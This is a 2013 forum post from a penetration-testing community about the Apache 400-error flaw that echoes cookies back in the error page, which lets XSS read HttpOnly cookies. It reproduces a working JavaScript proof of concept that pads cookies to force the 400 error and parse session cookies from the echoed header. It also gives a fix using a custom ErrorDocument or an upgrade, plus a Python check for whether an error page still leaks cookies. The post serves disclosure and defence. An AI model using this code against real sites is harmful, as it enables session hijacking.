China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: Apache HttpOnly Cookie XSS vulnerability

Author: admin    Time: 2013-4-19 19:15
Many programs, including commercial and mature open-source CMS article systems, set the HttpOnly attribute on their cookies to keep XSS from stealing user cookies: it prevents JavaScript from reading the cookie directly through document.cookie and so lowers the impact of an XSS. The issue described here can be used to bypass exactly that HttpOnly attribute.

Open a site in Chrome, press F12 to open the developer tools, switch to the Console, enter the following code and press Enter:

// http://www.exploit-db.com/exploits/18442/
function setCookies (good) {
    // Construct string for cookie value
    var str = "";
    for (var i = 0; i < 819; i++) {
        str += "x";
    }
    // Set cookies
    for (i = 0; i < 10; i++) {
        // Expire evil cookie
        if (good) {
            var cookie = "xss" + i + "=;expires=" + new Date(+new Date() - 1).toUTCString() + "; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss" + i + "=" + str + ";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();
    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content
            var content = xhr.responseText.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
            // match() returns null when the page has no <pre>, so guard before reading .length
            if (content && content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                // Drop the padding cookies set above, then split the remaining pairs
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object
                for (var i = 0; i < cookies.length; i++) {
                    // split the element, not the array; trim the space that follows each ';'
                    var s_c = cookies[i].trim().split('=', 2);
                    if (s_c[0]) {
                        cookie_dict[s_c[0]] = s_c[1];
                    }
                }
                // Unset malicious cookies
                setCookies(true);
                alert(JSON.stringify(cookie_dict));
            }
        }
    }
    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}
makeRequest();

You will then see a glorious 400 error page containing the cookie information.

Download: https://gist.github.com/pilate/1955a1c28324d4724b7b/download#

Fix:

Apache officially offers four ways of handling errors (http://httpd.apache.org/docs/2.0/mod/core.html#errordocument):

In the event of a problem or error, Apache can be configured to do one of four things,

1. output a simple hardcoded error message
2. output a customized message
3. redirect to a local URL-path to handle the problem/error
4. redirect to an external URL to handle the problem/error

In my testing, for 400 errors only method 2 works; the response then no longer contains the cookie contents.

Apache configuration:

ErrorDocument 400 "security test"

Of course, upgrading Apache to the latest version also works :).
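To verify that a server's 400 page no longer echoes the request's Cookie header (the reflection the PoC above depends on), the following Python check is an added example, not part of the original post or of the exploit-db code: it parses a saved 400 response body the same way the PoC does and reports which of the cookies that were sent came back verbatim. Both response bodies are constructed samples, modelled on Apache 2.2's default 400 page and on the custom ErrorDocument shown above.

```python
import re

# The <pre> block in which Apache's default 400 page echoed the offending header.
PRE_RE = re.compile(r"<pre>(.*?)</pre>", re.S)


def parse_cookie_header(header):
    """Split a Cookie request header ("a=1; b=2") into {name: value}."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def echoed_cookie_header(body):
    """Return the Cookie header reflected inside <pre> of an error page, or None."""
    match = PRE_RE.search(body)
    if not match:
        return None
    for line in match.group(1).splitlines():
        if line.startswith("Cookie:"):
            return line[len("Cookie:"):].strip()
    return None


def leaked_cookies(body, sent_cookie_header):
    """Cookies we sent whose exact name=value pair is reflected in the error body.
    HttpOnly only hides a cookie from document.cookie; the browser still sends it,
    so an echoed header makes the value readable from an XHR response."""
    echoed = echoed_cookie_header(body)
    if echoed is None:
        return {}
    sent = parse_cookie_header(sent_cookie_header)
    back = parse_cookie_header(echoed)
    return {name: value for name, value in sent.items() if back.get(name) == value}


# Constructed sample data: the Cookie header the browser sent, and two 400 bodies.
SENT_COOKIE = "PHPSESSID=constructed-session-id-123; lang=en; xss0=" + "x" * 819
VULNERABLE_400 = (
    "<html><head><title>400 Bad Request</title></head><body>\n<h1>Bad Request</h1>\n"
    "<p>Your browser sent a request that this server could not understand.<br />\n"
    "Size of a request header field exceeds server limit.<br />\n"
    "<pre>\nCookie: " + SENT_COOKIE + "\n</pre>\n</p>\n</body></html>\n"
)
FIXED_400 = "security test"  # body produced by: ErrorDocument 400 "security test"

if __name__ == "__main__":
    print("vulnerable:", sorted(leaked_cookies(VULNERABLE_400, SENT_COOKIE)))  # ['PHPSESSID', 'lang', 'xss0']
    print("fixed:", leaked_cookies(FIXED_400, SENT_COOKIE))                    # {}
```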

Reference: http://httpd.apache.org/security/vulnerabilities_22.html